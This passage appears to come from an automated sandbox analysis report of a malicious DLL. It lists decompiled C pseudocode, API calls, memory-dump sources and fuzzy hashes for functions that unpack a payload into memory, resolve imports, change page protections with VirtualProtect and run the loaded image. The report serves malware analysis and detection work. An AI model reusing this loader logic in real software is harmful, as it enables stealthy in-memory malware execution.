											 *_t89 = _t93 + _v32 - _t82;
											_v32 = _v40;
											_t89 = _t89 + 4;
										}
										_t33 =  &_v12;
										 *_t33 = _v12 - 1;
									} while ( *_t33 != 0);
								}
								_t69 = _v44;
								_t77 =  *((intOrPtr*)(_t61 + 0xc)) -  *((intOrPtr*)(_t61 + 8)) +  *((intOrPtr*)(_t61 + 4));
								_v16 = _v16 + 0x1000;
								 *0x6e1d41cc = _t77;
							} while (_t69 < _t67);
						}
						if(_t77 != 0x63699bc3) {
							_v24 = 0xc;
						} else {
							memcpy(_v48, _v36, _v20);
						}
						VirtualFree(_v36, 0, 0x8000); // executed
					}
				}
				return _v24;
			}






























    0x6e1d18b4
    0x6e1d18c4
    0x6e1d18cb
    0x6e1d18ce
    0x6e1d18e3
    0x6e1d18ea
    0x6e1d18ef
    0x6e1d1900
    0x6e1d1903
    0x6e1d1909
    0x6e1d190d
    0x6e1d1910
    0x6e1d19ec
    0x6e1d1916
    0x6e1d1916
    0x6e1d191a
    0x6e1d19b2
    0x6e1d1920
    0x6e1d1921
    0x6e1d1926
    0x6e1d1929
    0x6e1d192c
    0x6e1d192c
    0x6e1d1933
    0x6e1d1936
    0x6e1d193e
    0x6e1d193f
    0x6e1d1940
    0x6e1d1947
    0x6e1d194b
    0x6e1d1951
    0x6e1d1955
    0x6e1d1957
    0x6e1d195b
    0x6e1d195e
    0x6e1d1965
    0x6e1d1968
    0x6e1d196d
    0x6e1d1970
    0x6e1d1986
    0x6e1d1972
    0x6e1d197c
    0x6e1d197e
    0x6e1d1981
    0x6e1d1981
    0x6e1d198d
    0x6e1d198d
    0x6e1d198d
    0x6e1d1965
    0x6e1d1998
    0x6e1d199b
    0x6e1d199e
    0x6e1d19a7
    0x6e1d19a7
    0x6e1d19af
    0x6e1d19be
    0x6e1d19d3
    0x6e1d19c0
    0x6e1d19c9
    0x6e1d19ce
    0x6e1d19e4
    0x6e1d19e4
    0x6e1d19f3
    0x6e1d19f9

    APIs
    • VirtualAlloc.KERNELBASE(00000000,?,00003000,00000004,?,?,?,00000000), ref: 6E1D1903
    • memcpy.NTDLL(?,?,?,?,?,?,00000000), ref: 6E1D19C9
    • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?,00000000), ref: 6E1D19E4
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Virtual$AllocFreememcpy
    • String ID: Jun 6 2021
    • API String ID: 4010158826-1013970402
    • Opcode ID: 10c98d889466c28bb866948141a64c647ce7c5f455e569170e124be8c4350af7
    • Instruction ID: d56ef6bfded13ad5aefd51e5cdebdbc9911afae8045ff06b34095f7e3ee3ed42
    • Opcode Fuzzy Hash: 10c98d889466c28bb866948141a64c647ce7c5f455e569170e124be8c4350af7
    • Instruction Fuzzy Hash: EB413C71E0121A9FDB04CFD9C880ADEBBB5BF49310F248129D90577244D775AA8ADF90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D20CE, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6E1D20CE(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E1D1C7D(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







    0x6e1d20d7
    0x6e1d20dc
    0x6e1d20ea
    0x6e1d20ef
    0x6e1d20ef
    0x6e1d20f5
    0x6e1d20fa
    0x6e1d20fe
    0x6e1d2102
    0x6e1d2102
    0x6e1d210c
    0x6e1d2115

    APIs
    • GetCurrentThread.KERNEL32 ref: 6E1D20D1
    • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E1D20DC
    • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E1D20EF
    • SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6E1D2102
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Thread$Priority$AffinityCurrentMask
    • String ID:
    • API String ID: 1452675757-0
    • Opcode ID: 3ccf669207e99a893e1896307531ec86807627eb76d25dfa543e1eece35bf322
    • Instruction ID: 2c8e07d7cf8bc2c890c7019686ee98e422d95f8468a3b7f6372322c1d4e15ec3
    • Opcode Fuzzy Hash: 3ccf669207e99a893e1896307531ec86807627eb76d25dfa543e1eece35bf322
    • Instruction Fuzzy Hash: 7AE09231306A252B96016B698C88EAFAB5CDF923307114235F534D21D0DB549C4EE5A5
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D126D, Relevance: 4.6, APIs: 3, Instructions: 68memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 87%
    			E6E1D126D(void* __eax, void* _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				long _v20;
				int _t43;
				long _t54;
				signed int _t57;
				void* _t58;
				signed int _t60;

				_v12 = _v12 & 0x00000000;
				_t57 =  *0x6e1d41cc;
				_t58 = ( *(__eax + 0x14) & 0x0000ffff) + __eax + 0x18;
				_v16 =  *(__eax + 6) & 0x0000ffff;
				VirtualProtect(_a4,  *(__eax + 0x54), _t57 - 0x63699bbf,  &_v20); // executed
				_v8 = _v8 & 0x00000000;
				if(_v16 <= 0) {
					L12:
					return _v12;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t60 = _v12;
					if(_t60 != 0) {
						goto L12;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						asm("bt [esi+0x24], eax");
						if(__eflags >= 0) {
							L8:
							_t54 = _t57 - 0x63699bbf;
							L9:
							_t43 = VirtualProtect( *((intOrPtr*)(_t58 + 0xc)) + _a4,  *(_t58 + 8), _t54,  &_v20); // executed
							if(_t43 == 0) {
								_v12 = GetLastError();
							}
							_v8 = _v8 + 1;
							_t58 = _t58 + 0x777fa9b0 + _t57 * 0x28;
							if(_v8 < _v16) {
								continue;
							} else {
								goto L12;
							}
						}
						asm("bt [esi+0x24], eax");
						_t54 = _t57 - 0x63699bc1;
						if(__eflags >= 0) {
							goto L9;
						}
						goto L8;
					}
					asm("bt [esi+0x24], eax");
					if(_t60 >= 0) {
						_t54 = _t57 - 0x63699ba3;
					} else {
						_t54 = _t57 - 0x63699b83;
					}
					goto L9;
				}
				goto L12;
			}












    0x6e1d1277
    0x6e1d1284
    0x6e1d128a
    0x6e1d1296
    0x6e1d12a6
    0x6e1d12a8
    0x6e1d12b0
    0x6e1d1345
    0x6e1d134c
    0x00000000
    0x00000000
    0x00000000
    0x6e1d12b6
    0x6e1d12b6
    0x6e1d12b6
    0x6e1d12ba
    0x00000000
    0x00000000
    0x6e1d12c6
    0x6e1d12ca
    0x6e1d12ee
    0x6e1d12f2
    0x6e1d1306
    0x6e1d1306
    0x6e1d130c
    0x6e1d131b
    0x6e1d131f
    0x6e1d1327
    0x6e1d1327
    0x6e1d132f
    0x6e1d1332
    0x6e1d133f
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x6e1d133f
    0x6e1d12fa
    0x6e1d12fe
    0x6e1d1304
    0x00000000
    0x00000000
    0x00000000
    0x6e1d1304
    0x6e1d12d2
    0x6e1d12d6
    0x6e1d12e0
    0x6e1d12d8
    0x6e1d12d8
    0x6e1d12d8
    0x00000000
    0x6e1d12d6
    0x00000000

    APIs
    • VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1D12A6
    • VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D131B
    • GetLastError.KERNEL32 ref: 6E1D1321
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ProtectVirtual$ErrorLast
    • String ID:
    • API String ID: 1469625949-0
    • Opcode ID: dab466aa1fef39633953ffcd4b66989a227940603a93c479070d5bc90d12bb03
    • Instruction ID: c40fd85d41af758383b71e13bd60663bf56b83a8a4df56f2ac4e8ee0b58a1d3c
    • Opcode Fuzzy Hash: dab466aa1fef39633953ffcd4b66989a227940603a93c479070d5bc90d12bb03
    • Instruction Fuzzy Hash: 98218331A0120BEFCB14CFD9C481AAAF7F5FF08319F108959D11697584E3B8A69DDB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D14E8, Relevance: 4.6, APIs: 3, Instructions: 60stringthreadCOMMON
    Download Yara Rule
    C-Code - Quality: 80%
    			E6E1D14E8() {
				char _v28;
				void _v44;
				char _v48;
				void* _v52;
				long _t23;
				int _t24;
				void* _t28;
				intOrPtr* _t30;
				signed int _t34;
				intOrPtr _t36;

				_push(0);
				_push(0x6e1d41c4);
				_push(1);
				_push( *0x6e1d41d0 + 0x6e1d5089);
				 *0x6e1d41c0 = 0xc;
				 *0x6e1d41c8 = 0; // executed
				L6E1D1DA8(); // executed
				_t34 = 6;
				memset( &_v44, 0, _t34 << 2);
				if(E6E1D1697( &_v44,  &_v28,  *0x6e1d41cc ^ 0xfd7cd1cf) == 0) {
					_t23 = 0xb;
					L7:
					ExitThread(_t23);
				}
				_t24 = lstrlenW( *0x6e1d41b8);
				_t7 = _t24 + 2; // 0x2
				_t10 = _t24 + _t7 + 8; // 0xa
				_t28 = E6E1D1144(_t36, _t10,  &_v48,  &_v52); // executed
				if(_t28 == 0) {
					_t30 = _v52;
					 *_t30 = 0;
					if( *0x6e1d41b8 == 0) {
						 *((short*)(_t30 + 4)) = 0;
					} else {
						E6E1D2118(_t40, _t30 + 4);
					}
				}
				_t23 = E6E1D1444(_v44); // executed
				goto L7;
			}













    0x6e1d14fa
    0x6e1d14fb
    0x6e1d1500
    0x6e1d1508
    0x6e1d1509
    0x6e1d1513
    0x6e1d1519
    0x6e1d1522
    0x6e1d1527
    0x6e1d1545
    0x6e1d159a
    0x6e1d159b
    0x6e1d159c
    0x6e1d159c
    0x6e1d154d
    0x6e1d1553
    0x6e1d1561
    0x6e1d1565
    0x6e1d156c
    0x6e1d1574
    0x6e1d1578
    0x6e1d157a
    0x6e1d1589
    0x6e1d157c
    0x6e1d1582
    0x6e1d1582
    0x6e1d157a
    0x6e1d1591
    0x00000000

    APIs
    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,6E1D41C4,00000000), ref: 6E1D1519
    • lstrlenW.KERNEL32(?,?,?), ref: 6E1D154D
      • Part of subcall function 6E1D1144: GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?,?), ref: 6E1D1151
      • Part of subcall function 6E1D1144: _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6E1D1167
      • Part of subcall function 6E1D1144: _snwprintf.NTDLL ref: 6E1D118C
      • Part of subcall function 6E1D1144: CreateFileMappingW.KERNELBASE(000000FF,6E1D41C0,00000004,00000000,?,?), ref: 6E1D11B1
      • Part of subcall function 6E1D1144: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A,?), ref: 6E1D11C8
      • Part of subcall function 6E1D1144: CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6E1D156A,0000000A), ref: 6E1D11FD
    • ExitThread.KERNEL32 ref: 6E1D159C
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: DescriptorFileSecurityTime$CloseConvertCreateErrorExitHandleLastMappingStringSystemThread_aulldiv_snwprintflstrlen
    • String ID:
    • API String ID: 4209869662-0
    • Opcode ID: ebfae3ca93e30e7448592a7d6da1d0d160e3fb6de852f3f74c5a9f194742bd72
    • Instruction ID: 4aa20b3292e5e6a675c3ae8daa59823da94b0aba656c7598ab82c4a0ce69c74a
    • Opcode Fuzzy Hash: ebfae3ca93e30e7448592a7d6da1d0d160e3fb6de852f3f74c5a9f194742bd72
    • Instruction Fuzzy Hash: 6711BCB2205705AFDB01DFA4CC48E8BBBECBB56704F018A16F555D7180D734E58EAB92
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1ADB, Relevance: 2.5, APIs: 2, Instructions: 48memoryCOMMON
    Download Yara Rule
    C-Code - Quality: 83%
    			E6E1D1ADB(void* __ecx) {
				void* _v8;
				char _v12;
				char* _t18;
				char* _t25;
				char* _t29;

				_t22 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t25 = 0;
				if(E6E1D1697( &_v8,  &_v12,  *0x6e1d41cc ^ 0x196db149) != 0) {
					if(_v8 == 0) {
						_t29 = 0;
					} else {
						_t29 = E6E1D2087(_t22, _v8,  *0x6e1d41cc ^ 0x6e49bbff);
					}
					if(_t29 != 0) {
						_v12 = E6E1D1E8A(_t22) & 0x0000ffff;
						_t18 = StrStrIA(_t29,  &_v12); // executed
						if(_t18 != 0) {
							_t25 = 0x657;
						}
					}
					HeapFree( *0x6e1d4190, 0, _v8);
				}
				return _t25;
			}








    0x6e1d1adb
    0x6e1d1ade
    0x6e1d1adf
    0x6e1d1af5
    0x6e1d1afe
    0x6e1d1b03
    0x6e1d1b1c
    0x6e1d1b05
    0x6e1d1b18
    0x6e1d1b18
    0x6e1d1b20
    0x6e1d1b2a
    0x6e1d1b32
    0x6e1d1b3a
    0x6e1d1b3c
    0x6e1d1b3c
    0x6e1d1b3a
    0x6e1d1b4c
    0x6e1d1b4c
    0x6e1d1b57

    APIs
    • StrStrIA.KERNELBASE(00000000,6E1D1CE6,?,6E1D1CE6,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1B32
    • HeapFree.KERNEL32(00000000,?,?,6E1D1CE6,?,00000000,00000000,?,?,?,6E1D1CE6), ref: 6E1D1B4C
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: FreeHeap
    • String ID:
    • API String ID: 3298025750-0
    • Opcode ID: 583e41f90a9ead5f50ccb3fe81d62f16dcf1141ee04d566119223fb132462c18
    • Instruction ID: 36088c0ec8635c02b5e80dd9a4574a6aa94ce236bb5f0ff0c9475bb5d856da9e
    • Opcode Fuzzy Hash: 583e41f90a9ead5f50ccb3fe81d62f16dcf1141ee04d566119223fb132462c18
    • Instruction Fuzzy Hash: A7018476B01515ABDB01CBE5CC00EDFB7BDEB95240F118161A900E3104E631EA49BAA4
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2117C5, Relevance: 1.8, APIs: 1, Instructions: 292COMMON
    Download Yara Rule
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Process$CodeCurrentFeaturePagePresentProcessorTerminateValid
    • String ID:
    • API String ID: 2794151160-0
    • Opcode ID: afbe8a763c757b71232505818bf73a9cb8d918f5f8cfb53ee3c80b804d7bfd12
    • Instruction ID: 79bb3211e316d84c8ecc41538292d86556b90d80b7bfc6cbeb5374c35b4d3c43
    • Opcode Fuzzy Hash: afbe8a763c757b71232505818bf73a9cb8d918f5f8cfb53ee3c80b804d7bfd12
    • Instruction Fuzzy Hash: E391C07591821F9BEB549FA4CC51BEA73FAFF28345F0044A9DE0997244E7319B88CB90
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E213D8A, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FB55: RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000), ref: 6E20FB96
    • _free.LIBCMT ref: 6E213DF6
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: AllocateHeap_free
    • String ID:
    • API String ID: 614378929-0
    • Opcode ID: 3d386286e3168ca0f4cfdf0954778653b59a02e8dfd1a61260543b773b1e8d2f
    • Instruction ID: 9bb86732a968d79b634daeab4ab1716dde9afc4a9a9d5c524959b88502e6b980
    • Opcode Fuzzy Hash: 3d386286e3168ca0f4cfdf0954778653b59a02e8dfd1a61260543b773b1e8d2f
    • Instruction Fuzzy Hash: A001DB761043096BE3218F999C859DAFBEFFB85371F26051DD694832C0EB3069058764
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FB55, Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000), ref: 6E20FB96
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 74f8a7329542a2dbc64394a64d9a8392da895a33ad744d7de7edd9b160db1a8b
    • Instruction ID: bb76266345a211a2efb9c45693764c6bbcaa9175777c810a34086a887ab86a8c
    • Opcode Fuzzy Hash: 74f8a7329542a2dbc64394a64d9a8392da895a33ad744d7de7edd9b160db1a8b
    • Instruction Fuzzy Hash: 3CF0BB355C562E6BBB511EE78C24E9B375FAF49771B208111D816A65C4CB30D8018EA8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E2113DA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FB55: RtlAllocateHeap.NTDLL(00000008,6E1F73C4,00000000), ref: 6E20FB96
    • _free.LIBCMT ref: 6E2113FA
      • Part of subcall function 6E20FBB2: HeapFree.KERNEL32(00000000,00000000,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4), ref: 6E20FBC8
      • Part of subcall function 6E20FBB2: GetLastError.KERNEL32(6E1F73C4,?,6E21B6FD,6E1F73C4,00000000,6E1F73C4,00000000,?,6E21B9A1,6E1F73C4,00000007,6E1F73C4,?,6E219934,6E1F73C4,6E1F73C4), ref: 6E20FBDA
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: Heap$AllocateErrorFreeLast_free
    • String ID:
    • API String ID: 314386986-0
    • Opcode ID: d48916c4652f2fac2dc31da548d56929d1858106ee56d51a6abf9b617d990fea
    • Instruction ID: 9de1a6804f68dd816cf41f793e5abbcf7266107c0e62d03ed2aebbe822309f2b
    • Opcode Fuzzy Hash: d48916c4652f2fac2dc31da548d56929d1858106ee56d51a6abf9b617d990fea
    • Instruction Fuzzy Hash: 76F08C76A0020AAFD310DFA8C441B8AB7F8EB48710F104266ED18D7380EB71AA508BD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E213A21, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
    Download Yara Rule
    APIs
    • GetUserDefaultLCID.KERNEL32(00000055,?,00000000,6E21BCFB,?,00000055,00000050), ref: 6E213A6B
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: DefaultUser
    • String ID:
    • API String ID: 3358694519-0
    • Opcode ID: 4f415023c610a5615d8305e38bcfe9ee4c6f1bb93c80b6c5c10d14eb7fa80f36
    • Instruction ID: 3470fae2a557baa562fb948877667a93b2fe2ade7a54c795828217d8aa903db3
    • Opcode Fuzzy Hash: 4f415023c610a5615d8305e38bcfe9ee4c6f1bb93c80b6c5c10d14eb7fa80f36
    • Instruction Fuzzy Hash: A2F09A3154410CBBCF05ABA4CD09EEEBFABFB15B20F014054BA1A5A250EA328B50EAD1
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E20FBEC, Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMON
    Download Yara Rule
    APIs
    • RtlAllocateHeap.NTDLL(00000000,0000060B), ref: 6E20FC1E
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: AllocateHeap
    • String ID:
    • API String ID: 1279760036-0
    • Opcode ID: 2c3eec3785ba95d81f2971bc11f9b1dab030c0e0a03ea65a8e9907c09be05467
    • Instruction ID: c358d25fe9392d9647971427fd58aa662be8bfe2048752e485a8380011c78157
    • Opcode Fuzzy Hash: 2c3eec3785ba95d81f2971bc11f9b1dab030c0e0a03ea65a8e9907c09be05467
    • Instruction Fuzzy Hash: E4E0E5351C512F6BFBD05AEA4C06F87764FEF537A2F210520DD22962C4EB24C84181E8
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E1D1444, Relevance: 1.3, APIs: 1, Instructions: 70COMMON
    Download Yara Rule
    C-Code - Quality: 86%
    			E6E1D1444(void* __eax) {
				char _v8;
				void* _v12;
				void* __edi;
				void* _t18;
				long _t24;
				long _t26;
				long _t29;
				intOrPtr _t40;
				void* _t41;
				intOrPtr* _t42;
				void* _t44;

				_t41 = __eax;
				_t16 =  *0x6e1d41cc;
				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4);
				_t18 = E6E1D1060( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e1d41cc - 0x63698bc4 &  !( *0x6e1d41cc - 0x63698bc4), _t16 + 0x9c96647d,  &_v8,  &_v12); // executed
				if(_t18 != 0) {
					_t29 = 8;
					goto L8;
				} else {
					_t40 = _v8;
					_t29 = E6E1D1A5A(_t33, _t40, _t41);
					if(_t29 == 0) {
						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
						_t24 = E6E1D1F7C(_t40, _t44); // executed
						_t29 = _t24;
						if(_t29 == 0) {
							_t26 = E6E1D126D(_t44, _t40); // executed
							_t29 = _t26;
							if(_t29 == 0) {
								_push(_t26);
								_push(1);
								_push(_t40);
								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
									_t29 = GetLastError();
								}
							}
						}
					}
					_t42 = _v12;
					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
					E6E1D142F(_t42);
					L8:
					return _t29;
				}
			}














    0x6e1d144c
    0x6e1d144e
    0x6e1d146a
    0x6e1d147b
    0x6e1d1482
    0x6e1d14e0
    0x00000000
    0x6e1d1484
    0x6e1d1484
    0x6e1d148e
    0x6e1d1492
    0x6e1d1497
    0x6e1d149a
    0x6e1d149f
    0x6e1d14a3
    0x6e1d14a8
    0x6e1d14ad
    0x6e1d14b1
    0x6e1d14b6
    0x6e1d14b7
    0x6e1d14bb
    0x6e1d14c0
    0x6e1d14c8
    0x6e1d14c8
    0x6e1d14c0
    0x6e1d14b1
    0x6e1d14a3
    0x6e1d14ca
    0x6e1d14d3
    0x6e1d14d7
    0x6e1d14e1
    0x6e1d14e7
    0x6e1d14e7

    APIs
      • Part of subcall function 6E1D1060: GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6E1D1480,?,?,?,?,00000002,00000000,?,?), ref: 6E1D1084
      • Part of subcall function 6E1D1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10A6
      • Part of subcall function 6E1D1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10BC
      • Part of subcall function 6E1D1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10D2
      • Part of subcall function 6E1D1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10E8
      • Part of subcall function 6E1D1060: GetProcAddress.KERNEL32(00000000,?), ref: 6E1D10FE
      • Part of subcall function 6E1D1A5A: memcpy.NTDLL(00000000,00000002,6E1D148E,?,?,?,?,?,6E1D148E,?,?,?,?,?,?,00000002), ref: 6E1D1A87
      • Part of subcall function 6E1D1A5A: memcpy.NTDLL(00000000,00000002,?,00000002,00000000,?,?), ref: 6E1D1ABA
      • Part of subcall function 6E1D1F7C: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E1D1FB4
      • Part of subcall function 6E1D126D: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?,00000002), ref: 6E1D12A6
      • Part of subcall function 6E1D126D: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E1D131B
      • Part of subcall function 6E1D126D: GetLastError.KERNEL32 ref: 6E1D1321
    • GetLastError.KERNEL32(?,?), ref: 6E1D14C2
    Memory Dump Source
    • Source File: 00000003.00000002.613044435.000000006E1D1000.00000020.00020000.sdmp, Offset: 6E1D0000, based on PE: true
    • Associated: 00000003.00000002.613025498.000000006E1D0000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613065340.000000006E1D3000.00000002.00020000.sdmp Download File
    • Associated: 00000003.00000002.613101446.000000006E1D5000.00000004.00020000.sdmp Download File
    • Associated: 00000003.00000002.613130163.000000006E1D6000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
    • String ID:
    • API String ID: 2673762927-0
    • Opcode ID: c2be5cf71f2b77d8682003e9b9d69453fbda36f574a3d22f0d869e4507976a8f
    • Instruction ID: 1f4a730b1804be37d59766e785c1c125414b6d309666d2be29b3734c2bff2adf
    • Opcode Fuzzy Hash: c2be5cf71f2b77d8682003e9b9d69453fbda36f574a3d22f0d869e4507976a8f
    • Instruction Fuzzy Hash: BC115B76301705ABD711DBE98C80DDB73FCAF882047108558E901D7140EBB0ED4E97A0
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    Function 6E21CB2F, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 86COMMON
    Download Yara Rule
    APIs
    • GetLocaleInfoW.KERNEL32(FDE8FE81,2000000B,00000000,00000002,00000000,?,?,?,6E21CE4E,?,00000000), ref: 6E21CBC8
    • GetLocaleInfoW.KERNEL32(FDE8FE81,20001004,00000000,00000002,00000000,?,?,?,6E21CE4E,?,00000000), ref: 6E21CBF1
    • GetACP.KERNEL32(?,?,6E21CE4E,?,00000000), ref: 6E21CC06
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.613182963.000000006E1DE000.00000020.00020000.sdmp, Offset: 6E1DE000, based on PE: false
    Similarity
    • API ID: InfoLocale
    • String ID: ACP$OCP
    • API String ID: 2299586839-711371036
    • Opcode ID: b6726d2e6cc2284b84bde912b25ea16d80bda2f9e0bbb3d21ca38d78e230e948
    • Instruction ID: 917291aee3cc2081f9c02be5241a2c82acf27f39e8db5e7fc47fc673910dc7d5
    • Opcode Fuzzy Hash: b6726d2e6cc2284b84bde912b25ea16d80bda2f9e0bbb3d21ca38d78e230e948
    • Instruction Fuzzy Hash: 9521863965C10A9BD7588FD5C902AC773E7AB45F61B654474EA0ADF104E732DF40C790
    Uniqueness

    Uniqueness Score: -1.00%

    Function 6E21CD03, Relevance: 7.7, APIs: 5, Instructions: 188COMMON
    Download Yara Rule
    APIs
      • Part of subcall function 6E20FA06: GetLastError.KERNEL32(0000001C,00000000,6E209156,00000000,00000000,?,6E2127FC,00000000,00000000,?,?,0000001C), ref: 6E20FA0A
      • Part of subcall function 6E20FA06: _free.LIBCMT ref: 6E20FA3D
